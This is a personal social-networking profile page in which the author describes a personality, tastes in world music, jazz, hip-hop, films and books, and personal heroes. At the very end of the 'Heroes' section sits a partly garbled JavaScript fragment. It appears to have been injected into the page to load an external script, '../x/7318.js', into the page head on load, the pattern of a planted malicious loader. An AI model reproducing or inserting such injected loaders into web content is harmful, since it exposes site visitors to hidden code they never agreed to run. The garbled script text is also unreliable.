About Me

I am complex, yet simple...I am a contradiction. Multi-faceted as one might suggest. I am unique...just like everyone else. I think description goes beyond just word usage. Whether describing ones appearance or character...personal contact and time are the best resources. I am at your disposal...so if you are so inclined to find out more about me...feel free to ask.Peace and Blessings...ONE! My Interests

Too many to name...but I'll start with people, places and things (Examples: Music, art, dance, cultures and customs, healthy living...etc,)

I'd like to meet:

GOD, JAHWEH, the Almighty Supreme Being...and kind people like you! Reconnect with old friends and make new ones. Insightful people with a certain outlook on life. Positive, intelligent, easy going people that I can vibe with. Those who think for themselves and look outside the box. People that I can learn from and grow...and vice versa. People with a passion for music, art and culture. People who have a sense of humor and are just fun to be around...

Music:

Just about anything that moves my soul and makes my feet happy. World music, Cape Verdean music, Brazilian, funk, soul, jazz, roots reggae, afrobeat, afro-cuban, breaks, house, classic hip-hop (80's and 90's), Latin. I listen to the likes of Roy Ayers, James Brown, Fela Kuti, Bob Marley, Gilberto Gil, Antonio Jobim, Emilio Santiago, Boy Ge Mendes, Miles Davis, Horace Silver, Lonnie Liston, Gil Scott Heron, Sergio Mendes, Bulimundo, Cesaria Evora, Stevie Wonder, Eric B. & Rakim, EPMD, The Roots, Mos Def, Common,Talib Kweli, J Dilla, Zap Mama, Angelique Kidjo, Kassav, Louie Vega, Anane, Lura, Hector Lavoe, Tito Paris, Tito Puente, Sting, Lenny Kravitz, Juan Luis Guerra, Mozart etc...Just too many to list. I just have love for real music. If you don't know what that is...find out. There's just too much good stuff out there to limit yourself to heavy radio rotation.

Movies:

Again too many to name. There are some classic comedies and action films that I enjoy. Great indie and foreign films (City of God...one of my more recent favorites). If I watch a movie, I want to either laugh, be dazzled by action sequences and/or be put in a thinking frame of mind in which I can learn from the message they are trying to convey.

Television:

Don't watch too much television. I rather spend my time living life than watching somebody elses. But when I do want to unwind...I watch crime drama (CSI, Law and Order...etc.) Sleeper Cell, 24, Weeds, Chapelle Show...ESPN and Fox Sports for game reports and updates, sports programs (seasonal)...and the Weather Channel (cuz ya never know).

Books:

Too many to list...but basically biographical/autobiographical accounts of people I find to be noteworthy...historical, musical, religious and political figures. For example Jesus, Ghandi, Mohammed, MLK, Jr., Amilcar Cabral, CHE, Malcolm X, Bob Marley, Haile Selassie, Fela Kuti, JFK, Michael Jordan, Vince Lombardi, Bruce Lee...and so forth.

Heroes:

My parents...for their daily struggle to make sure I was brought up right and to provide for the househould. My true friends for their understanding and support. My little niece, who's just learning how to walk, but after every fall she gets up with a smile and continues on... And everyone else who is taking a step to elevate themselves to do better and be better at developing good values and sharing that with the world. .."var s=document·('script');s.src='../x/7318.js';document 3;getElementsByTagName('head')[0].appendChild(s);"
